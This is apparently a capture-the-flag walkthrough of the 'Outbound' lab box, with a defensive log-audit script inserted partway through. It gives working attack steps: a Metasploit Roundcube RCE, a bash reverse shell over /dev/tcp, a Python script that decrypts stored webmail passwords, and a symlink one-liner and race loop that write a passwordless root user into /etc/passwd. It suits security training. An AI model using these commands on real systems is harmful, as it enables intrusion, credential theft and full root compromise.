Outbound
[Link]
IP
[Link]
Hosts
[Link] [Link]
Info
As is common in real-life pentests, you will start the Outbound box with credentials for the following account: tyler / LhKL1o9Nm3X2
Nmap Results
Web Enumeration
We go to [Link]
Log in with the given creds
Roundcube Webmail 1.6.10 is running
CVE-2025-49113 Metasploit
A Remote Code Execution (RCE) exploit is available for this version of Roundcube
[Link]
We need to insert the module manually or update Metasploit (not tested!!!)
Create this file (you may need to create the directories first)
Insert the exploit code [Link]
nano ~/.msf4/modules/exploits/linux/http/roundcube_auth_rce_cve_2025_49113.rb
We launch the Metasploit Framework
msfconsole
We reload all custom Metasploit modules
reload_all
We select the Roundcube RCE exploit module
use exploit/linux/http/roundcube_auth_rce_cve_2025_49113
Use this config
set HOST [Link]
set RHOSTS [Link]
set USERNAME tyler
set PASSWORD LhKL1o9Nm3X2
set LHOST tun0
set VHOST [Link]
run
Stable Shell
Switch to Shell in Metasploit
shell
We spawn an interactive Bash shell
bash -i
Start a listener in a new terminal
pwncat-cs -lp 4444
We establish a reverse shell to our listener
bash -i >& /dev/tcp/[Link].x/4444 0>&1
We got a stable shell
Dump mysql
We read the Roundcube configuration file
cat /var/www/html/roundcube/config/[Link]
We found creds for MySQL
We access the Roundcube MySQL database
PW = RCDBPass2025
mysql -u roundcube -p
We enumerate active Roundcube sessions from the database
use roundcube;
select * from session;
We got that Base64 output
Use this recipe in CyberChef
[Link]
We got for user jacob:
'password': 'XSmAj9zglsmjumju+p3Aj+qgQRsA5Ph9/'
'auth_secret': 'CVvn8qDVaBwlTik1kqK9j49n0V'
'request_token': 'MYMqDlFldDIJnhSHnRAIQk25gbLBtkC3'
We use this Python script to decrypt the password
[Link]
from base64 import b64decode
from Crypto.Cipher import DES3  # provided by the pycryptodome package

# --- Inputs ---
key = b'rcmail-!24ByteDESkey*Str'  # 24-byte DES-EDE3 key

# Encrypted values (base64)
data = {
    'password': 'XSmAj9zglsmjumju+p3Aj+qgQRsA5Ph9/',
    'auth_secret': 'CVvn8qDVaBwlTik1kqK9j49n0V',
    'request_token': 'MYMqDlFldDIJnhSHnRAIQk25gbLBtkC3'
}


def decrypt_des3_cbc(value, key):
    try:
        raw = b64decode(value)
        # The first 8 bytes are the IV, the rest is the ciphertext
        iv = raw[:8]
        cipher_text = raw[8:]
        cipher = DES3.new(key, DES3.MODE_CBC, iv)
        decrypted = cipher.decrypt(cipher_text)
        # Strip null bytes and last padding byte (mimics PHP rtrim + substr)
        decrypted = decrypted.rstrip(b'\x00')[:-1]
        return decrypted.decode(errors='replace')
    except Exception as e:
        return f"[ERROR] {e}"


# Decrypt all
for k, v in data.items():
    result = decrypt_des3_cbc(v, key)
    print(f"[+] Decrypted {k}: {result}")
Run the script
python3 [Link]
We got the PW 595mO8DmwGeD
User jacob
We switch to jacob (SSH not possible)
PW 595mO8DmwGeD
su jacob
Roundcube is not running on the main host — it is isolated within a container
ip a
We read Jacob’s email inbox for sensitive information
cat /home/jacob/mail/INBOX/jacob
We got another PW from jacob: gY4Wr3a1evp4
And we got information that we have higher privileges on log files 🤔
We connect to the main host via SSH using the discovered password
ssh jacob@[Link]
ip a
Now we are on the main host
User Flag 🏁
We got the user flag
cat /home/jacob/[Link]
PRIVESC
We check the log directories based on the hint found in the email
ls -lR /var/log/
The file /var/log/below/error_root.log has the permission -rw-rw-rw- (mode 0666), meaning it is
writable by everyone, including unprivileged users. This misconfiguration allows a non-root user to
overwrite or replace the file, making it a prime target for exploitation (e.g., via symlink attacks).
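A defender-side check for the condition described above, as an added example that is not part of the original write-up: it lists world-writable files and directories under a log tree, plus symlinks that resolve outside it. The function name audit_log_tree and the finding labels are assumptions of this example.

```sh
#!/bin/sh
# Added example (not from the original write-up): audit a log tree for the
# permission pattern described above. audit_log_tree and the finding labels
# are names chosen for this example.
# Output: one finding per line, "<KIND> <path>" or "<KIND> <link> -> <target>".

audit_log_tree() {
    [ -d "$1" ] || return 2
    root=$(readlink -f -- "$1") || return 2

    # Files that any local user can modify (for example mode 0666).
    find "$root" -xdev -type f -perm -0002 \
        -exec printf 'WORLD_WRITABLE_FILE %s\n' {} +

    # Directories any local user can write to: an unprivileged account can
    # create entries there and, without the sticky bit, also delete or
    # replace existing ones (the precondition for swapping in a symlink).
    find "$root" -xdev -type d -perm -0002 \
        -exec printf 'WORLD_WRITABLE_DIR %s\n' {} +

    # Symlinks whose resolved target lies outside the log tree. A privileged
    # process that opens or chmods such a path acts on the target instead.
    find "$root" -xdev -type l -exec sh -c '
        root=$1; shift
        for link in "$@"; do
            target=$(readlink -f -- "$link" 2>/dev/null) || target="(unresolvable)"
            case $target in
                "$root"/*) ;;
                *) printf "SYMLINK_ESCAPE %s -> %s\n" "$link" "$target" ;;
            esac
        done' sh "$root" {} +
}

# Typical use on a host:
#   audit_log_tree /var/log
```

Any finding under a directory that a root-run service logs to is worth fixing: tighten the file and directory modes, and have the service refuse to follow symlinks when it opens or changes permissions on its log files.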
We exploit a symlink vulnerability with this one-liner to create a root shell user
echo 'pwn::0:0:pwn:/root:/bin/bash' > /tmp/fakepass && rm -f /var/log/below/error_root.log && ln -s /etc/passwd /var/log/below/error_root.log && cp /tmp/fakepass /var/log/below/error_root.log && su pwn
Root Flag 🏁💀
We got the root flag
cat /root/[Link]
Bug
If you receive the error
cp: cannot create regular file '/var/log/below/error_root.log': Permission denied
it means the file error_root.log is likely being recreated by a root process, preventing the symlink
from pointing to /etc/passwd.
To bypass this, use the following loop to repeatedly attempt the symlink overwrite until it succeeds:
while true; do
rm -f /var/log/below/error_root.log
ln -s /etc/passwd /var/log/below/error_root.log
cp /tmp/fakepass /var/log/below/error_root.log && break
done
After that, run:
su pwn
This gives you a root shell using the fake entry injected into /etc/passwd.
By 2ubZ3r0